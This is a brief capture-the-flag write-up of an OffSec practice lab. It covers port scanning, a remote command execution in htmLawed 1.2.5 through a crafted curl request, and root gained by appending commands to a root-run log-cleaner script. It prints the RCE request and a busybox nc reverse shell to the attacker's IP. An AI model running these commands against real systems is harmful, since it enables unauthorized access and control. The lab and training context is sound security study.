law
00 min
2025-3-27
Source
https://portal.offsec.com/labs/practice
Date
Mar 26, 2025 → Mar 26, 2025
Tag
Nmap
Web Exploitation
Privilege Escalation Techniques

192.168.108.190

Nmap

└─# nmap -sT -p- --min-rate 5000 $ip Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 01:46 EDT Nmap scan report for 192.168.108.190 Host is up (0.059s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 14.62 seconds
└─# nmap -sU -p- --min-rate 5000 $ip Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 01:46 EDT Warning: 192.168.108.190 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.108.190 Host is up (0.066s latency). All 65535 scanned ports on 192.168.108.190 are in ignored states. Not shown: 65386 open|filtered udp ports (no-response), 149 closed udp ports (port-unreach)
Nmap done: 1 IP address (1 host up) scanned in 145.48 seconds
└─# nmap -Pn -n $ip -sC -sV -p- --open -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 01:48 EDT Nmap scan report for 192.168.108.190 Host is up (0.056s latency). Not shown: 65466 closed tcp ports (reset), 67 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA) | 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA) |_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-title: htmLawed (1.2.5) test |_http-server-header: Apache/2.4.56 (Debian) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.49 seconds

22

notion image
nothing found

80

notion image
notion image
Change the curl command to our IP and command
curl -s -d "sid=foo&hhook=exec&text=whoami" -b "sid=foo" http://192.168.108.190/
notion image
busybox nc 192.168.45.160 4444 -e /bin/bash
notion image
got in

PE

move linpeas.sh to target machine
notion image
we found that have a script to clean something let’s take a look
notion image
so it is a log cleaner
notion image
we also dont have permission to look at the logs file, so i guess it is a root excute script, since this script is added by current user, let try added some PE command into it
notion image
after added it in, we got the root permission
 
上一篇
HB
下一篇
AZ-900